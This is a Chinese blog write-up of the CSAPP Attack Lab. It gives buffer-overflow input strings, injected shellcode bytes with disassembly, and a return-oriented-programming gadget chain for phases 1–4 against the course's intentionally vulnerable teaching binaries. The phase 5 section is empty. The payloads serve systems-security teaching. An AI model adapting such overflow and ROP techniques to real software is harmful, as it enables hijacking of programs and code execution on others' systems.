CSAPP-Attack lab

最新推荐文章于 2023-12-16 14:19:34 发布
最新推荐文章于 2023-12-16 14:19:34 发布
阅读量182 收藏 2
点赞数
分类专栏: OS 文章标签: 操作系统
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mazamu/article/details/120919991
版权

文章目录

此实验有五个任务

在这里插入图片描述

第一个任务

这个任务的内容是跳转到touch1函数

void test(){
	int val;
	val = getbuf();
	printf("No exploit. Getbuf returned 0x%x\n", val);
}

unsigned getbuf() {
	char buf[BUFFER_SIZE];
	Gets(buf);
	return 1;
}

void touch1() {
	vlevel = 1;
	printf("Touch1!: You called touch1()\n");
	validate(1);
	exit(0);
}

解题思路: 1.找到touch1()的起始地址、2.修改 test()调用getbuf()时 压入的返回地址为touch1()的起始地址。

步骤一:
objdump -d ctarget ctarget.d
vim ctarget.d
:/touch1

很容易找到touch1()的起始地址为:0x00000000004017c0
在这里插入图片描述

步骤二:
利用缓冲区溢出来来修改retq地址
vim ctarget.d
:/getbuf
可得到%rsp-28得到字符数组的首地址,0x28即40字节(40B),即BUFFER_SIZE

在这里插入图片描述

一个char是1B,则需要输入40个字符才能缓冲区溢出,
可以使用以下去检验
./ctarget -q
aaaa ...分别输入39和40个字符

可以知道输入40个字符时已经缓冲区溢出。

先给出答案:
弄个result.txt:
ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff
c0 17 40 00 00 00 00 00

./hex2raw < result.txt | ./ctarget -q
可看到成功通过第一个任务。

原因是:函数调用时,会把返回地址压栈,再进入函数,40个f之后,缓冲区满了,接下来的输入是为了顶掉原来的返回地址(这里是小端存储),所以(0x00000000004017c0表示为 0xc017400000000000),hex2raw函数是为了生成攻击字符串,只需要我们输入我们的结果,它便自动生成相应ascii码。

第二个任务

带参数跳cookie转到touch2,
答案:

ff ff ff ff ff ff ff ff
48 c7 c7 fa 97 b9 59
68 ec 17 40 00
c3
ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff
80 dc 61 55 00 00 00 00

48 c7 c7 fa 97 b9 59 	mov    $0x59b997fa,%rdi
68 ec 17 40 00       	pushq  $0x4017ec
c3                   	retq

字符串首地址是0x5561dc78,这里的意思是,跳转到字符串中间,中间是我们写的代码(你需要自己写汇编语言,然后反汇编查看它的代码)。这里的意思是将cookie放入rdi,然后把返回地址压栈,接着retq跳转到压栈的地址。

第三个任务

将你的cookie转化成字符串,并带着字符串首地址跳转到touch3
答案:

48 c7 c7 a8 dc 61 55
68 fa 18 40 00
c3
ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff
78 dc 61 55 00 00 00 00
35 39 62 39 39 37 66 61 00

第三题也是注入代码,将 cookie 的字符串的地址传入函数,注入代码和第二题类似,但是注意因为> 第三题中,后续操作会将 buf 栈中的 40 个字节覆盖了,所以不能将字符串存储中这里,改为存储在调用函数前的栈中,通过打断点得到其栈顶地址是 0x5561dca0 。所以应该把字符串存入的地址设为 0 x5561dca8 ,这个地址在输入的 16 进制中就紧跟着跳转的地址。
注入的代码(已经反编译了):

48 c7 c7 a8 dc 61 55    mov    $0x5561dca8,%rdi
68 fa 18 40 00          pushq  $0x4018fa
c3                      retq

第四个任务

查阅文档, 48 89 c7 就是 movq %rax,%rdi ,就将栈上的值存入了 %rdi ,因此将 cookie > 值存入栈中,就可以传值,这段代码地址是 0x4019a2
因此输入字符串先是一段填充的 40 字节,然后是跳转地址,设为 pop 的地址 0x4019ab ,接着存入 cookie 值(就是将要 pop 的那个值,注意应存入 64 位值),然后是 mov 的地址 0x4019a2 ,> 最后跳转到 touch2 ,这样一个完整的 ROP 攻击链就形成了,一个可行的答案就是:

ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff
ab 19 40 00 00 00 00 00
fa 97 b9 59 00 00 00 00
a2 19 40 00 00 00 00 00
ec 17 40 00 00 00 00 00

第五个任务

mazamu
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
计算机系统基础实训三—AttackLab实验,2024年最新网络安全开发面经分享
2401_83621136的博客
04-21 774
值得注意的是,上面两路完成任务的寄存器不能互换,因为从%eax到%esi这条路线上面的mov都是4个byte的操作,如果对%rsp的值采用这条路线,%rsp的值会被截断掉,最后的结果就错了。第六步,将%edx的内容传送到%ecx,movl%edx,%ecx的指令字节为:89 d1,所以这一步的gadget地址为: 401ba2+2=401ba4。第一步,获取到%rsp的地址,movq%rsp,%rax的指令字节为: 48 89 e0,所以这一步的gadget地址为: 401b86+3=401b89。
深入理解计算机系统attack lab
热门推荐
peanWang的博客
05-26 4万+
Attack lab
CSAPP--ATTACKLAB实验
qq_53336526的博客
12-08 6810
武汉大学csapp实验三attacklab
【CSAPP】AttackLab
朝花夕拾
11-03 2万+
这份史上最全的CSAPP之AttackLab实验讲解汇总绝对是攻克这一难题的最佳利器!无论你是刚刚踏入计算机科学的大门,还是已经是一位经验丰富的程序员,这万字详解都将对你产生深远的影响。从最基础的概念到高级的技巧,每一个步骤都被超全面、超详细地剖析。这篇文章是你攻克CSAPP AttackLab的不二之选,不容错过!收藏它,它将成为你的最佳学习伴侣,引领你通往计算机科学的精彩世界!
深入理解计算机系统AttackLab实验
weixin_51230027的博客
03-21 6086
深入理解计算机系统AttackLab实验,函数中的Gets函数与标准库中的gets函数类似,它从standard input中读取字符(以\n或者EOF结尾)并将它们添加字符串结尾符\0后存入缓冲区中。学生需要根据ctarget和rtarget文件及其反汇编代码来确定缓冲区位置及大小,并想办法构建出攻击字符串。
Attack Lab----深入理解计算机系统
weixin_53016579的博客
04-23 2030
阅读(writeup)文件,可以知道该实验分为两大部分。书ctarget是易受代码注入攻击的可执行程序,利用 代码注入(Code injection) 攻击该程序rtarget是易受面向返回的编程攻击的可执行程序,利用 返回导向编程(Return-oriented programming) 攻击该程序另外,如果在 ubuntu 系统上直接运行这两个程序,是无法运行的,因为服务器没有使用 CMU 的内网,无法建立连接。如下在中也提供了解决方法,如下运行程序时,传入命令参数-h可以打印可能的命令行参数列表;
CSAPP-3e-Solutions:CSAPP 3e解决方案,已从已关闭的gitbook.io迁移到github.io
05-03
CSAPP-3e-解决方案 计算机系统:程序员的观点第三版解决方案建造先决条件x64 linux系统码头工人克隆码git clone https://github.com/DreamAndDead/CSAPP-3e-Solutions.gitcd CSAPP-3e-Solutions拉图像sudo docker ...
PB16030899 -朱河勤-csapp-shell-lab-report.pdf
09-14
PB16030899 - 朱河勤 - csapp-shell-lab-report.pdf 这篇lab报告的主要目的是实现一个简单的shell程序,使用C语言编写。该shell程序支持一些内部命令,如pwd、ls、cd、cat、env、export、unset等,以及外部命令。...
CSAPP-LAB:注释和计算机系统实验室程序员的观点3e
02-04
CSAPP
CSAPP-LAB6-Malloc
07-20
CSAPP的内存分配实验,只上传了修改过代码的c文件,其他就不上传了=。=
csapp-lab1详解
最新发布
05-28
csapp_lab1详解
CSAPP 之 AttackLab 详解.doc
07-12
CSAPP 之 AttackLab 详解.doc
CSAPP-Lab03 Attack Lab 详细解析
qq_25591221的博客
03-05 1万+
目录实验概览Part 1: Code Injection AttacksPhase 1分析反汇编`test`反汇编`getbuf`SolutionPhase 2分析注入代码栈帧讲解SolutionPhase 3分析注入代码栈帧讲解SolutionPart 2: Return-Oriented ProgrammingPhase 4分析栈帧讲解SolutionPhase 5分析栈帧讲解Solution总结 纸上得来终觉浅,绝知此事要躬行 实验概览 Attack!,成为一名黑客不正是我小时候的梦想吗?这个实验
【CSAPP】Attacklab 详解
Schriefer的博客
08-16 2861
CSAPP中attacklab的详解
CSAPP 缓冲区溢出实验
poptar的博客
06-06 1965
实验5 缓冲区溢出实验 一、实验目的 1、深入了解缓冲区溢出的隐患,了解如何利用缓冲区溢出这个漏洞对现有程序进行控制流劫持、执行非法程序代码,从而造成对程序进行攻击以及破坏的过程; 2、增强对程序机器级表示、汇编语言、调试器和逆向工程等理解。 二、实验内容 对目标程序实施缓冲区溢出攻击,通过造成缓冲区溢出来破坏目标程序的栈帧结构,继而...
计算机系统--实验三AttackLab实验
weixin_52363821的博客
12-16 2713
AttackLab实验
【深入理解计算机系统】CSAPP-实验三:AttackLab详解
qq_42234461的博客
09-18 1万+
前言 本章要求我们实践使用code-injection和return-oriented programming来模拟对程序进行攻击。实验过程增加了对调试工具gdb的使用熟练度,也进一步理解了程序不安全带来的问题。 本机使用win10 +wsl2.0 + ubuntu18.04完成实验。 点击查看我的全部代码 另外,记得查看README 以及 WRITEUP以看实验要求。 reference CSAPP LAB 深入理解计算机系统(3)——attack lab CSAPP:Attack lab 用到的命令行
CSAPP——Lab3——AttackLab
zheyuan的博客
12-02 3465
本篇文章是CSAPP配套实验的第三个,基于缓冲区溢出的攻击实验,和前面的bomb lab同属一章,它们都属于机器级编程这一章的内容,前面的bomb lab是为了阅读和理解汇编语言代码,而这个实验则是为了理解过程调用和x86栈帧结构。 首先还是以吐槽开头,这个实验文件还是从学校系统里下载的,但是很多东西有问题甚至是误导性的。学校将原本的栈缓冲区大小改为了12个字节,并把原版代码包中的hex2raw程序改成了sendstring(迷惑行为,这个函数后来被证明是有问题的),同时做的PPT语焉不详。哦对,这个实验用
CSAPP Lab3:Attack Lab
倪多多的博客
05-16 8716
该实验是《深入理解计算机系统》(英文缩写CSAPP)课程附带实验——Lab3:Attack Lab,和Lab 2:Bomb Lab都对应书中第三章内容(程序的机器级表示),该实验分为代码注入或面向返回的编程两部分,进行缓冲区溢出攻击。
CSAPP的bomb lab
04-19
CSAPP的bomb lab是CMU(卡内基梅隆大学)计算机系统导论课程(Computer Systems: A Programmer's Perspective)中的一个实验项目。该实验旨在帮助学生理解计算机系统的底层原理和安全性。 在bomb lab中,学生需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值